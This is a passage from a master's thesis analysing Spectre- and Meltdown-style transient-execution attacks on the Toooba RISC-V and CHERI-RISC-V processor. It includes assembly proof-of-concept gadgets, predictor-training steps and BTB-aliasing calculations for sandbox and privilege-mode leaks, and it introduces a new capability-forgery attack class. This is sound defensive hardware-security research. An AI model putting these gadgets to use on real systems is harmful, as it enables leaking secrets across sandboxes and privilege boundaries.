multiple branch direction predictors. Toooba uses a tournament predictor,

which consists of one local and one global predictor. Both the local and the

global predictor have their own Branch History Table (BHT). A two bit selec-

tor determines which of these two predictors is used for the actual response

of the tournament predictor. The goal of the attack is to train the prediction

for the branch-greater-equal (bge) instruction such that it predicts

not taken when the actual attack will be conducted. To achieve that, attack-

ers have two options. They can either train the global predictor to return not

taken for that particular branch or they can train the local predictor to return

not taken. The attacker has to keep in mind that it is important to train the

selector accordingly as well. In Section 5.1.1, I explain thoroughly how I train

the tournament predictor in order to achieve a successful attack. The principle

of training remains the same over all Spectre-PHT attacks I conducted.

In later stages of this work, I reviewed Toooba’s branch direction predic-

tion and made the following observation. When a specific branch is predicted

the first time by the tournament predictor, the predictor always uses the local

branch prediction unit. Furthermore, the local branch predictor is initialised

with predicting False for the first prediction. Therefore, whenever Toooba en-

counters a branch the first time, it will be predicted to False. For the Spectre-

PHT attack as shown in Figure 5.1, this means that the branch prediction does

the attacker-desired action by default. Therefore, an attacker does not need

a training phase to conduct a successful attack, which I have confirmed in a

Page 47: Analysis of Transient-Execution Attacks on the out-of

34 CHAPTER 4. RISC-V RESULTS

pratical example of Spectre-PHT. This helps the attacker in two ways. First,

the attack becomes easier as no previous training calls are needed and second

the attacker saves time, which positively affects the bandwidth of a real-world

attack.

4.1.2 Spectre-PHT-Write

This variant of Spectre-PHT seeks to conduct a speculative write instead of a

speculative load [34]. Out-of-bounds writes can be used to direct control-flow

to a gadget of interest for the attacker, e.g., by overwriting the return address re-

siding on the software stack. Speculatively overwriting a return address can be

the starting point of a Return-Oriented Programming (ROP) attack [48]. With

code not using capabilities, I successfully crafted an attack that overwrites the

return address such that the control-flow will be speculatively directed to a

gadget revealing a register value.

4.1.3 Spectre-BTB

Following Canella et al. [19], all Spectre-style attacks can be conducted in-

place and out-of-place. However, throughout my thesis work, Spectre-BTB

is the only attack were I attempted both attack types. In Figure 4.1, both the

in-place and the out-of-place variant is depicted. On the left side, the two in-

direct jumps are mapped to the same BTB entry and therefore one jump can

impact the prediction of another jump. The exact explanation of why and how

a BTB entry is aliased in Toooba is given in Section 5.1.3. On the right side of

Figure 4.1, there is only one jump that trains the BTB. Depeding on whether

funct is called from call_0 or call_1, the jump will take different direc-

tions. Therefore, previous calls to funct impact the branch target prediction

of that jump. Both attacks reach the same goal, which is training a BTB entry.

I reproduced both attacks with code similar to the one shown in Figure 4.1

and both attacks were successful. For the remainder of this thesis, I only use

Spectre-BTB out-of-place as it I believe it is more convenient for an attacker to

directly poison the BTB instead of indirectly calling another function. There-

fore, I will use the abbreviation Spectre-BTB for the out-of-place variant.

4.1.4 Spectre-RSB

The goal of Spectre-RSB attacks is to create a mismatch between hardware

and software return addresses. In order to reproduce this attack, I created

examplary code, which fetches its return address from memory and returns

Page 48: Analysis of Transient-Execution Attacks on the out-of

CHAPTER 4. RISC-V RESULTS 35

800000c8: jr t1

...

800202c8: jalr t1

call_0:

la a0, addr_0

jal ra, funct

...

call_1:

la a0, addr_1

jal ra, funct

...

funct:

jr a0

Figure 4.1: Left: Spectre-BTB out-of-place, right: Spectre-BTB in-place.

to this address. This does not match the address predicted by hardware and

therefore allows an attacker to alter control-flow in speculation. I conducted

a similar attack for CHERI-RISC-V processors and because of redundancies,

the attack is only thoroughly explained in Section 5.1.5.

Another option to create a mismatch between the software and hardware

return address stacks is to – if allowed by hardware – let the RSB overflow [23,

24]. In Toooba, the RSB has room for eight return addresses. If the call depth

is greater than eight function calls, the subsequent return addresses will over-

write the ones already present. This can be used by an attacker to conduct a

Spectre-RSB attack as well. I created an attack, which causes a recursive func-

tion to call itself more than eight times. This fills all entries of the RSB with

return addresses pointing to instructions in the code of the recursive function.

The returns to the recursive function will be predicted correctly, but the jump

returning to the calling function will be mispredicted and will execute parts of

the recursive function one more time, which reads out-of-bounds values in my

example.

4.1.5 Spectre-STL

Spectre-STL is based on memory disambiguation making wrong predictions.

I successfully conducted the attack described in Figure 2.4. Again, the repro-

duction in CHERI-RISC-V assembly is similar and therefore the exact reasons

will be described in Section 5.1.6. This attack will be referred to as Spectre-

Page 49: Analysis of Transient-Execution Attacks on the out-of

36 CHAPTER 4. RISC-V RESULTS

asm

Meltdown-US ✗

Meltdown-GP ✗

Table 4.2: Overview of attempted Meltdown-style attacks on RISC-V Toooba

and whether they were successful.

STL-Load. Besides revealing a secret through two loads, the attacker can fol-

low another goal – jumping to an arbitrary target . This attack is referred to

as Spectre-STL-Jump. This attack is based on the same principles as Spectre-

STL-Load. However, the attack requires a preparation phase in which the at-

tacker inserts a valid code address. This code address is stored at the address,

whose content is loaded twice due to wrong memory disambiguation. There-

fore, the load that is predicted to be independent does not load a secret value,

but a valid code address. If this code address is used in a jump before Toooba

recognises that its memory disambiguating was wrong, the attacker will be

able to jump to any arbitrary target.

4.2 Meltdown Attacks

In this section, I describe the Meltdown-style attacks attempted on RISC-V

Toooba. The attacks and their respective outcomes are summarised in Ta-

ble 4.2, which shows that none of the attempted attacks could be conducted

successfully. However, these two attacks are an essential part of the test suite

as their analysis shows how to prevent them. Furthermore, it is important to

test new implementations such that no conventional Meltdown-style attack is

possible.

4.2.1 Meltdown-US

For Meltdown-US, I created a scenario as it would be the case when a real

operating system is running. In my setup, the operating system code runs in S

privilege mode and has its own code and data page. The U(ser) bit is cleared for

both S mode pages, which means that U mode code cannot access these pages.

The attacker code runs in U privilege mode and also has its own code and data

page. Similar to Meltdown-US-CHERI presented in Section 5.2.1, the attacker

tries to access data without having sufficient permission – in Meltdown-US on

Page 50: Analysis of Transient-Execution Attacks on the out-of

CHAPTER 4. RISC-V RESULTS 37

ExeMem

TLB-Req

FinishMem

Check ReorderBuf

Figure 4.2: The last two stages of the Toooba memory pipeline which performs

permission and capability checks.

the granularity of 4KiB pages.

The translation from virtual to physical addresses is conducted in the last

stage of the memory pipeline in Toooba as shown in Figure 4.2. The ExeMem

stage sends the request to the Translation Lookaside Buffer (TLB) and the

FinishMem stage receives the corresponding response. Besides the physical

address the access rights are available at this stage as well. Therefore, the

exception – a page fault – will be set to the cause field of the Load-Store

Queue (LSQ) entry of this memory access. This load will never be issued and

thus Meltdown-US is not possible on Toooba.

4.2.2 Meltdown-GP

The Meltdown-GP attack seeks to read a register, which the code has no per-

missions to read. In my reproduction of the Meltdown-GP attack, user mode

code attempts to read the CSR mcause, which is forbidden as it is a register

only accessible by M mode code. The memory access is followed by a load to

an attacker-accessible array in order to make the secret visible.

However, as marked in Table 4.2, the Meltdown-GP attack is not possible

on Toooba. Checking which privilege mode is necessary is done as a part of

the Rename stage in Toooba. If the necessary privilege mode is not present,

the Rename stage will modify the respective Reorder Buffer (ROB) entry so

that the cause field is set to the exception to be raised. Furthermore, the in-

struction is marked as executed in the entry, which means that it never enters

the ALU pipeline. Therefore, the result will never be produced, which miti-

gates the attack as the following transient-instruction sequence cannot reveal

the secret register value.

Page 51: Analysis of Transient-Execution Attacks on the out-of

Chapter 5

CHERI-RISC-V Results

The main part of my thesis work was to extend my test framework for CHERI-

RISC-V processors. This collection of attacks shows how to practically use the

base framework presented in Chapter 4. In this chapter, I investigate whether

CHERI mitigates transient-execution attacks and how effective CHERI is in

that case. To my knowledge, this work is the first to practically reproduce

any transient-execution attack on a CHERI-RISC-V system. The attacks pre-

sented in this chapter extend the conventional attacks presented in Chapter 4.

Furthermore, I will introduce a new transient-execution attack subclass that

allows attackers to forge arbitrary and powerful capabilities in Toooba.

5.1 Spectre Attacks

As shown in Table 5.1, I successfully reproduced all four main Spectre attacks

and several applications of it on CHERI-RISC-V systems. In this section, I do

not describe every attack thoroughly as some of them have large similarities. In

this thesis work, I carried out examples in C as well. As depicted in Table 5.1,

these could be conducted successfully, but they will not be described in this

section as they do not pose a significant contribution to the vulnerability profile

of Toooba. However, an exemplary C attack is described in Appendix A.

5.1.1 Spectre-PHT

The CHERI-assembly code of my reproduction of the Spectre-PHT attack is

depicted in Figure 5.1. This is a close reproduction of the original work by

Kocher et al. [22] that has been introduced in Section 2.2.1. The example

checks whether an index (held in a0) is less than a global comparison variable

38

Page 52: Analysis of Transient-Execution Attacks on the out-of

CHAPTER 5. CHERI-RISC-V RESULTS 39

CHERI asm CHERI C

Spectre-PHT ✓/ ✗ ✓/ ✗

Spectre-PHT Write ✗ -

Spectre-BTB ✓ ✓

Spectre-RSB ✓ ✓

Spectre-STL-Load ✓ ✓

Spectre-STL-Jump ✓ -

CHERI-Sandboxes ✓ -

Priv-Mode-Regs ✓ -

Priv-Mode-Exec ✓ -

Table 5.1: Overview of attempted Spectre-style attacks in CHERI-RISC-V

Toooba and whether they were successful. Spectre-PHT is classed as (✓/✗) as

its success depends on the concrete capability configuration.

(stored at the address pointed to by ca2). If this is the case, an array holding

secret values (with its base address being held in ca1) will be accessed at index

a0. The resulting value will be used as the index to another array (with its base

address being held in ca3). In this example, I assume that the memory ad-

dresses pointed to by ca3 are also visible to the attacker, e.g., a shared memory

page between the victim and the attacker. Furthermore, I assume that ca1 al-

lows access to more addresses than [ca1.baseaddr, ca1.baseaddr+length−1],

where length is the global comparison value stored at the address pointed to

by ca2. This can either be caused by capabilities not being configured suit-

ably or by bounds not being exactly representable due to bounds compression

as it is done with 128-bit capabilities [38].

In my example, I decided to train Toooba’s tournament predictor to always

choose the local predictor, which will then return not taken. In order to reach

that, I call the assembly code in Figure 5.1 eight times with values for a0 such

that the a0 ∈ [0, . . . ,0x1f] holds. This will train the local BHT to return not

taken for this particular branch and train the selector to always choose the local

predictor for this branch. My choice for the other parameters remains the same

over the training phase and is shown in Table 5.2. After the training phase, the

attacker can start the actual attack.

For the actual attack, I choose the index to the secret array to be 0x40

(a0 = 0x40). For all other parameters, I use the values presented in Table 5.2.

As a preparation of the attack, I ensure that the load to the address stored in

Page 53: Analysis of Transient-Execution Attacks on the out-of

40 CHAPTER 5. CHERI-RISC-V RESULTS

// a0: index to secret array

slli t1, a0, 3

cincoffset ca1, ca1, t1 // ca1: secret array base addr.

cld t0, 0(ca2) // ca2: comparison value

bge a0, t0, end

cld t2, 0(ca1) // access secret value

// use spec. execution

cincoffset ca3, ca3, t2 // ca3: shared mem. page

cld t2, 0(ca3)

end:

// other code

Figure 5.1: Reproduction of the Spectre-PHT attack in CHERI assembly.

Capability Reg Description

ca1: capability spanning [0x80001000 ,0x80001fff ]

ca2: capability spanning [0x80002000 ,0x80002007 ]

8 byte value 0x20 at this address

ca3: capability spanning [0x80003000 ,0x80003fff ]

Table 5.2: Parameter configuration used for the Spectre-PHT attack.

ca2 will miss all caches. This is important to the attacker as the outstanding

load poses a dependency to the following branch instruction. Because of the

previous training phase, the branch bge will be predicted to not taken. This

means that from this point on the code following the branch instruction will be

mispredicted and therefore executed transiently. Due to the outstanding load

the misprediction cannot be resolved for the entire miss penalty time of the

load. The first speculative load following the mispredicted branch instruction

will be a memory access to the address 0x80001200 returning the value 0x200

in my example. This value is added in the next instruction to ca3, which points

to a memory region also accessible to the attacker. However, the first load was

illegal because the code does not allow accesses to addresses 0x80001100 or

greater. Later, Toooba will resolve this and rollback the speculatively executed

instructions, but the second load to an attacker accessible array has already

been issued and can be detected by the attacker.

This attack is classed as (✓/✗) as its success depends on the configuration

Page 54: Analysis of Transient-Execution Attacks on the out-of

CHAPTER 5. CHERI-RISC-V RESULTS 41

of the capability used for the first load. In both cases the code forbids the

first memory access, but the capability configuration is different in these two

instances of Spectre-PHT. If the capability is configured such that the mem-

ory access is out of capability bounds, the attack will not work. Otherwise,

the attack will work. For the explanation of why the capability configuration

mitigates the attack, see Section 5.2.1.

The important factor in this attack is the miss penalty of the load through

ca2. If this load missing all caches returns before the second load has been

issued, the attack will not be successful because Toooba will detect the mis-

prediction and not issue the second load and thus the attacker cannot detect the

timing difference through the cache later. In my simulation, it took the load

61 cycles from leaving the core until the value has returned. The first specula-

tive load is issued one cycle later and the second speculative load seven cycles

after the first load. Therefore, Spectre-PHT works as 53 cycles are left. This

means that an attacker can effectively use the spare cycles for executing other

transient instructions that reveal more complex internal state, e.g. shifting and

adding register values and then performing a load dependent on this data.

5.1.2 Spectre-PHT-CHERI-Write

When code is using capabilities in Toooba, this attack is successfully miti-

gated by CHERI. In my example, the attacker writes a double word to memory,

which effectively clears the tag bit of the capability stored at this address as

the stored data is no capability itself. Therefore, when the load of the return

address is conducted, this will lead to an invalid code capability being stored

into the return address register. Toooba cannot jump to this capability and

therefore this specific attack is successfully mitigated. Furthermore, a suitable

capability configuration, which enforces tight bounds, mitigates this specific

attack and variants of it in the first instance as described in Section 4.2.1.

5.1.3 Spectre-BTB on CHERI-Sandboxes

Sandboxes are designed to have strong memory protection against each other.

One sandbox is not allowed to leak secrets to another sandbox. Inspired by

Jonathan Woodruff and Jessica Clarke, I created an example that allows an

adversary sandbox to leak information from another sandbox. Software com-

partmentalisation is one of the main goals of CHERI – this attack has specif-

ically been designed to circumvent compartmentalisation and leak secrets of

a victim sandbox. This example contains two sandboxes. One of them is an

Page 55: Analysis of Transient-Execution Attacks on the out-of

42 CHAPTER 5. CHERI-RISC-V RESULTS

sand1_code:

// load capability to jump to

clc ct1, 16(ct6)

// load pcc into cs7

auipcc cs7, 0

// this jump is aliased in the BTB

cjr ct1

Figure 5.2: Code snippet of victim code in a sandbox which is under attack.

adversary sandbox, the other one is benign. The benign sandbox is referred to

as sand1, whereas the attacker sandbox is called attackbox.

The code of sand1, which is the victim sandbox being attacked by attack-

box, is depicted in Figure 5.2. The first instruction in the code of sand1 loads

a capability from memory and the last instruction jumps to it. The second in-

struction, auipcc, adds the second operand – shifted by 12 bits to the left –

to the current PCC. Since the second operand is zero in this example, auipcc

writes the current PCC to cs7. This is a common way to produce capabilities

for accessing data in CHERI-RISC-V and is regularly used by CHERI-LLVM.

Attacking Toooba’s BTB

The goal of the attack is to trick Toooba into speculatively jumping from the

benign sandbox sand1 into the attacker sandbox attackbox. Speculation for

indirect jumps – these are jumps like cjr ct1 – is done with help of the

BTB. To fully understand the design of the attack, I need to explain Toooba’s

BTB and the hashing function I added. The BTB is an indexed array with 256

entries of the form depicted in Figure 5.3. An entry has three fields: one valid

bit, an 8-bit tag, and the destination PCC target. When a jump is taken, a BTB

entry will be updated. The index of this entry is determined by PCCj[8 ∶ 1],

where PCCj is the PCC of the jump instruction. PCCj[X ∶ Y ] denotes a

selection of bits X down to Y from PCC, where the index 0 is the Least

Significant Bit (LSB) and index bitfield.length − 1 is the Most Significant

Bit (MSB) of a bit field. The tag is calculated by splitting up the address of

PCCj into bytes and XOR-ing all eight bytes. The target PCC is the PCC to

be executed in case the jump is taken. If a BTB entry is updated, its valid bit

will be set. The valid bit of each entry is zero at the start-up of the branch or

if set so by hardware, e.g., if branch prediction state flushing is implemented

as described in Section 2.3.2. When a branch prediction from the BTB is

Page 56: Analysis of Transient-Execution Attacks on the out-of

CHAPTER 5. CHERI-RISC-V RESULTS 43

V ’1 Tag’8 Target’129

Figure 5.3: Fields of an entry in Toooba’s BTB.

required, the index and the tag for that PCC is calculated and only if the valid

bit at that index is set and if the calculated tag compared the tag stored at

that index is equal, this is deemed a valid branch prediction and Toooba will

speculate to the target PCC of this entry.

The attacker wants to place an entry into the BTB so that the jump in Fig-

ure 5.2 speculatively leads to attacker chosen code execution when the victim

sandbox sand1 executes the next time. For this attack, I assume that the at-

tacker can freely choose the address where their code is placed in the address

space. In order to alias a BTB entry, an attacker needs to place a jump in-

struction at an address so that the following requirements are fulfilled, where

PCCb is the PCC of the jump in the victim sandbox, PCCa is the jump in

the attacker sandbox, addr() is the function that extracts the address of the its

argument PCC, and tag() is the function that calculates the tag by XOR-ing

the bytes of the respective PCC:

PCCb[8 ∶ 1] = PCCa[8 ∶ 1] (5.1)

tag(addr(PCCb)) = tag(addr(PCCa)) (5.2)

Mapping the attacker jump instruction to the same index in the BTB is

an easy task for an attacker. The more interesting task is to align the PCC of

the attacker jump instruction so that the tag value equals the tag of the victim

sandbox PCC tag. The sandbox to be attacked – sand1 – has a PCC with

the start address 0x80020000 and the length is 0x2000. The jump instruction

cjr ct1 is at the PCC: 0xffff200000018005_0000000080020244 . This is

the entire 128 bit code capability. As depicted in Figure 2.5, the upper 64 bits

contain the otype, the permissions, and the compressed bounds whereas the

lower 64 bits contain the actual address. The address is important in this attack

scenario and therefore separated by an underscore character from the rest of

the capability. I did not include the tag bit for capabilities in the description in

this subsection. It is obvious that all capabilities need to have valid tag bits in

order to be used for jumping and dereferencing memory. I chose the attacker

sandbox attackbox to start at the address 0x80040000 and have a length of

0x20000. I decided to choose 0xffff20000001a001_0000000080042044 as

the PCC for the jump. With that I wanted to demonstrate that it is possible

Page 57: Analysis of Transient-Execution Attacks on the out-of

44 CHAPTER 5. CHERI-RISC-V RESULTS

to conduct the attack in a single address-space operating system and that both

victim and attacker sandbox do not need to have the same bounds:

PCCb = 0xffff200000018005_0000000080020244 (5.3)

PCCa = 0xffff20000001a001_0000000080040444 (5.4)

tag(addr(PCCb)) = tag(addr(PCCa)) = 0xc4 (5.5)

PCCb[8 ∶ 1] = PCCa[8 ∶ 1] = 0x22 (5.6)

Conducting the Attack

Now, that we have understood how to alias an entry in the BTB, we have done

the most important part of the attack. The next step an attacker needs to con-

duct, is to actually place an entry at the respective index – this can be con-

sidered the training phase of the BTB. In order to achieve this, the attacker

runs its code – including the jump at PCCa – that branches to an attacker

chosen target. This target is the gadget the victim sandbox will speculatively

jump to during the actual attack. Suitable targets are explained in the follow-

ing paragraphs. The second training step is to ensure that the first instruction

in Figure 5.2 misses all caches in order to successfully misspeculate as long

as possible. If this was not the case, Toooba would quickly load the correct

PCC to jump to and correct its misspeculation before the transient-execution

sequence in the target gadget could take effect. After this training phase, the

attacker triggers or awaits the next execution of sand1. The load will miss all

caches and Toooba will speculatively jump to the attacker’s gadget with the

entire register state of sand1 being present.

The attacker can use the register state from sand1 in multiple ways to

achieve different goals of their attack. First, the attacker can leak one or more

secret values stored in a register. This can be the case if sand1 computes on

secret data, e.g., an encryption key. In order to reveal the secret, the attacker

performs a load to an attacker accessible array index by the secret. Second,

the register state can give the attacker access to a memory location of inter-

est, e.g., because only sand1 has a capability to this memory location. The

attacker loads the value of interest and conducts a second load to an attacker

accessible array indexed by that value in order to reveal it. Furthermore, it

is possible to load other capabilities through capabilities being present in the

current register state of the victim. In my example of the attack, I sought to use

the second method. The load missing all caches needs 88 cycles from being

issued to memory until returning to the core. The first speculative memory

Page 58: Analysis of Transient-Execution Attacks on the out-of

CHAPTER 5. CHERI-RISC-V RESULTS 45

access in the gadget fetching the secret into the core is issued with 20 cycles

left and the revealing load with 12 cycles left, which explains why the attack

is successful.

This sandbox attack includes the basic Spectre-BTB attack as demonstrated

in [22]. The pure Spectre-BTB attack has also been reproduced in this thesis

work, but will not be shown since its mechanism is included in this attack. Fur-

thermore, I produced other Spectre-BTB attacks, e.g., attacking direct jumps

and similar attacks. However, these were either not successful or could not

contribute to attack Toooba in a way not already explained. Therefore, I don’t

explain these attacks in this text.

5.1.4 Priv-Mode Attacks

The sandbox attacks bring up the question whether it is possible to speculate

over different privilege modes in RISC-V. I constructed two attacks proving

the hypothesis that it is possible, which are referred to as Priv-Mode-Regs and

Priv-Mode-Exec in Table 5.1. For both attacks, the scenario is that privileged

code, e.g., kernel code, is being executed in S privilege mode, whereas the at-

tacker code resides in U privilege mode. The goal of both attacks is to specula-

tively jump to the gadget chosen by the attacker. This scenario can be found in

real-world attacks as well as operating systems usually run in S privilege mode

in RISC-V [12]. A real-world attack for this scenario is further explained in

Section 6.1.4. None of the priv-mode attacks is possible if the Supervisor User

Memory (SUM) bit is cleared in sstatus. This mechanism prevents code

running in S mode from accessing pages that are accessible by U mode code1.

The SUM mechanism and related principles are thoroughly explained in the

privileged specification [12].

Priv-Mode-Regs

This attack is close to the sandbox attack presented in Section 5.1.3. The goal

of this attack is to speculatively jump from S privilege mode to U privilege

mode in order to use the register state set up by the S mode code. The two

main parts of the attack are again aliasing an entry in the BTB and delaying

a load such that a jump depending on that load will speculatively lead to the

execution of the attacker’s chosen gadget residing in U mode. Equal to the

sandbox attack, the goal of the attacker is to make use of the register state

1Code pages accessible by U privilege mode code have the U(ser) bit set in the respective

PTE.

Page 59: Analysis of Transient-Execution Attacks on the out-of

46 CHAPTER 5. CHERI-RISC-V RESULTS

of the S mode code by either leaking a value from or through the register

state. I constructed an attack that manages to leak a value through a powerful

capability of the kernel being present in the current register state. Another

particularly interesting target are Special Capability Registers (SCRs) as they

are expected to hold powerful capabilities.

Priv-Mode-Exec

The difference of this attack compared to the Priv-Mode-Regs attack is that

the attacker-chosen gadget makes use of the fact that the processor continues

to execute in S privilege mode in speculation. This means that the attacker has

permission to access CSRs. In my example, the gadget accesses sscratch –

which has been previously written to by the kernel – and then performs a load

to an attacker accessible array indexed by the value in sscratch. This attack

requires the PCC in U privilege mode to have its Access System Registers

(ASR) set as ASR restrains access to both CSRs and SCRs. RISC-V constrains

the access to CSRs by privilege modes, but CHERI-RISC-V adds the ASR

functionality on top. ASR restricts access to all CSRs, but seven white-listed

ones in which sscratch is not included [37]. This attack demonstrates how

to make use of the register values accessible to the code the speculative jump

came from.

For this attack, it is important to understand that the privilege mode a

RISC-V microprocessor currently operates in is an internal state and can only

be influenced by traps and their respective return operations. Furthermore,

this means that code can be executed in every privilege mode as long as it

does not contain privilege mode specific instructions, as for example mret

that can only be used in M privilege mode. A mret instruction executed in S

or U privilege mode will lead to an exception being raised. In my example the

revealing gadget is executed in both S and U privilege mode.

5.1.5 Spectre-RSB

Similar to the BTB, the RSB can contain powerful capabilities that can be of

use for an attacker. The code depicted in Figure 5.4 shows an example of priv-

ileged code that is called from user space. First, the code loads a new address

into the return address register cra. Next, the code loads its PCC into a reg-

ister, adds an offset to the capability address and stores a secret value to this

memory location. Finally, the code returns to the address previously loaded

into cra. However, Toooba will predict the return address and use the top

entry of the RSB for the prediction. This entry is a capability pointing to the

Page 60: Analysis of Transient-Execution Attacks on the out-of

CHAPTER 5. CHERI-RISC-V RESULTS 47

kernel_funct:

// load new return address

clc cra, 0(cs2)

// load kernel pcc into ct6

auipcc ct6, 0

li t1, 0x200

cincoffset ct6, ct6, t1

li t1, 0x400

// store secret

csd t1, 0(ct6)

// return

cret

Figure 5.4: Privileged code whose return address will be mispredicted in the

Spectre-RSB attack.

next instruction of the calling function. The RSB contains this entry because

the call to the privileged function caused the hardware to push it there. There-

fore, Toooba will speculatively jump to unprivileged code with the register

state of the privileged code. In fact, Toooba will always speculatively jump to

the next instruction of the calling code in the example depicted in Figure 5.4.

Later, Toooba will jump to the actual PCC when it realises its misspeculation.

Spectre-RSB gives the attacker the same possibilities to make use of the reg-

ister state of the privileged code as Spectre-BTB does. I created an example

that uses a powerful capability in the speculative register state in order to pull

a secret into the core and make it visible to the attacker via a second load.

What this attack needs is a mismatch between the software return address

and the address stored in the RSB. In my example, this is achieved by loading

another address into cra. For the attack to work, I made this load miss all

caches. This gives attackers the biggest possible time window to transiently

perform other loads that make the secret visible. As described in Section 4.1.4,

overflowing the RSB can also create a mismatch between hardware and soft-

ware return addresses. I successfully conducted this attack type in CHERI-

RISC-V assembly as well. Note that this only works if the capabilities allow

these memory accesses following previous explanations.

Page 61: Analysis of Transient-Execution Attacks on the out-of

48 CHAPTER 5. CHERI-RISC-V RESULTS

clc ca1, 0(cs1)

// ca1 and cs2 hold the same capability

csd a4, 0(ca1)

// memory disambiguation will lead to

// this being executed with stale data

cld a2, 0(cs2)

cincoffset cs3, cs3, a2

cld a3, 0(cs3)

Figure 5.5: Reproduction of the Spectre-STL attack in CHERI-RISC-V as-

sembly.

5.1.6 Spectre-STL

Spectre-STL-Load and Spectre-STL-Jump both rely on the fact the memory

disambiguation predicts a store-load pair to be independent although they ac-

cess the same memory address. As shown in Table 5.1, both Spectre-STL

variants work in CHERI-RISC-V Toooba.

Spectre-STL-Load

The code depicted in Figure 5.5 shows the sequence of instructions build-

ing the actual attack. The first instruction loads the capability at the address

pointed to by cs1 into ca1. I constructed the attack such that cs2 is stored

at this memory address. In my example, ca1 and cs2 are identical capabil-

ities, but in order for the attack to be successful they only need to point to

the same memory address. The following store and load instructions are ex-

ecuted out-of-order and in the assumption that they are non-dependent since

they use different capability registers for memory accesses. However, this is

not the case as both the store and the load go to the same memory address. This

load will be executed earlier than the store and therefore it does not return the

data of the store, but the previous content stored at this memory address. The

transient-instruction sequence following the load of the stale data will reveal

the secret data. Issuing a load of a value indexed by the secret to an attacker

accessible array with its base address stored in cs3 makes the secret visible

to the attacker.

Toooba’s memory disambiguation and out-of-order execution enable this

attack. When a memory instruction reaches the Rename stage, one instruction

per cycle is enqueued to the memory reservation station from which the mem-

Page 62: Analysis of Transient-Execution Attacks on the out-of

CHAPTER 5. CHERI-RISC-V RESULTS 49

ory pipeline pulls out its instructions. The memory pipeline will execute the

instructions as soon as all source register values are available. Toooba does

not have a dedicated unit for disambiguating memory accesses – it assumes

that memory accesses to different registers are not dependent. In case they

are, Toooba will perform a rollback and re-execute the affected instructions.

In my example, the first load introduces a delay for the second instruction as

they overlap in architectural register use. The second instruction cannot pro-

ceed in the memory pipeline. However, the third instruction can proceed in the

memory pipeline and produce its result as it does not overlap in architectural

register use. This leads to the transient-instruction sequence being executed

with stale memory data.

Spectre-STL-Jump

The setup for this attack is similar to the attack on RISC-V Toooba presented

in Section 4.1.5 with the difference that capabilities are used instead of in-

teger pointers. The fact that the stale value being loaded is not data, but a

valid code capability does not change the feasibility of this attack. The code

capability is valid and therefore Toooba takes the indirect branch to this ca-

pability’s address. Analogously to Spectre-STL-Load, the memory accesses

are not out-of-bounds and hence CHERI does not prevent this sequence of

speculative instructions. The attack works because Toooba generally assumes

memory operations not to be dependent as described above.

5.2 Meltdown Attacks

Table 5.3 shows an overview of the Meltdown attacks reproduced on CHERI-

RISC-V Toooba during this thesis work and whether they were successful.

Analogous to presenting the Spectre attacks, some attacks show large similar-

ities and therefore the common attacking techniques are explained only once.

5.2.1 Meltdown-US-CHERI

Meltdown-US-CHERI is an adaption of Meltdown-US. Instead of attempting

to read from a page, which the attacker does not have sufficient rights to ac-

cess, I attempted to read from a memory address through a capability out of

its bounds. This attack is especially tailored to CHERI – the results of the re-

production of the original Meltdown-US attack are presented in Section 4.2.1.

Page 63: Analysis of Transient-Execution Attacks on the out-of

50 CHAPTER 5. CHERI-RISC-V RESULTS

CHERI asm

Meltdown-US-CHERI ✗

Meltdown-GP-CHERI ✗

CBuildCap-Load ✓

CSetBounds-Load ✓

CInvoke-Load ✓

CUnseal-Load ✓

Table 5.3: Overview of attempted Meltdown-style attacks on CHERI-RISC-V

Toooba and whether they were successful.

The code for the attack is shown in Figure 5.6. The attack consists of three

basic parts. First, the attacker increases the offset to a desired address out of

capability bounds. The reader has to note that in CHERI setting the address

out of bounds is no illegal operation itself, but the memory access itself is.

This memory access done with the second instruction is the next part of the

attack. This loads the desired secret into the register t2. The following two

instructions are the final part of the attack and reveal the secret by a load to an

attacker accessible array with its base address in ct1.

However, this attack could not be conducted successfully in CHERI-RISC-

V Toooba. Its memory pipeline consists of multiple stages that dispatch the

instruction, read the register values, calculate the virtual address, translate the

virtual address to the physical address, and finally enqueue the memory access

into the LSQ. The last two pipeline stages are depicted in Figure 4.2. In the

last pipeline stage, Toooba performs the capability bounds checks and sets the

exception cause field in the corresponding LSQ entry in case an exception is

detected. Toooba only issues valid requests – without the cause field set – to

memory. Therefore, the out of bounds load will never be issued, which effec-

tively mitigates the entire attack. No revealing transient-execution sequence is

possible because the necessary result never becomes available.

5.2.2 Meltdown-GP-CHERI

The Meltdown-GP attack – presented in Section 4.2.2 and the Meltdown-GP-

CHERI attack have large similarities. Both attacks seek to read a register,

which the code has no permissions to read. In my Meltdown-GP-CHERI ex-

ample, the attacker wants to access the SCR mscratchc, which cannot be ac-

cessed if the current PCC does not have the ASR bit set, which is the case in my

Page 64: Analysis of Transient-Execution Attacks on the out-of

CHAPTER 5. CHERI-RISC-V RESULTS 51

melt_us_cheri:

// set ct0 offset out of bounds

cincoffsetimm ct0, ct0, 512

// perform load out of capability bounds

cld t2, 0(ct0)

// load again from another capability with offset

cincoffset ct1, ct1, t2

cld t2, 0(ct1)

Figure 5.6: Reproduction of the Meltdown-US attack tailored to CHERI ca-

pabilities.

setup for this attack. The access is followed by a load to an attacker-accessible

array in order to make the secret visible. Meltdown-GP-CHERI is therefore

a variant of Meltdown-GP tailored to CHERI systems as they offer the ASR

functionality compared to conventional RISC-V systems. However, as marked

in Table 5.3, this attack is not possible on CHERI-RISC-V Toooba. Similar to

the description of Meltdown-US in Section 4.2.2, checking whether the ASR

bit is set is done as a part of the Rename stage in Toooba. This leads to the

instruction being marked as executed in the ROB entry, which means that it

never enters the ALU pipeline. Therefore, the result will never be produced,

which mitigates the attack as the following transient-instruction sequence can-

not reveal the secret register value.

5.2.3 Meltdown-CF

Meltdown-CF (Capability Forgery) is a new subclass of transient-execution

attacks that was developed in this master’s thesis work. The goal of all at-

tacks in this subclass is the same: forging a capability to memory that the

attacker should not have access to in speculation and using this accordingly

in order to leak secrets. Therefore, Meltdown-CF attacks pose a large threat

to CHERI systems. All attacks in the Meltdown-CF class are inspired by

Jonathan Woodruff and members of the CHERI team who suspected a vul-

nerability in CHERI-RISC-V Toooba and encouraged me to attempt these ex-

ploits.

Page 65: Analysis of Transient-Execution Attacks on the out-of

52 CHAPTER 5. CHERI-RISC-V RESULTS

CBuildCap

The CBuildCap instruction has been added to CHERI-RISC-V in order to

increase performance when importing capabilities. CBuildCap attempts to

build a capability from a bit pattern. This instruction has three operands: The

bit pattern stored in a capability register, an authorising capability stored in

another capability register, and the destination capability register. The bit pat-

tern does not need to be tagged, but it must not pose an escalation of privileges

of the authorising capability. If this invariant is broken, an exception will be

raised [37]. The CBuildCap instruction can be logically split into two sub-
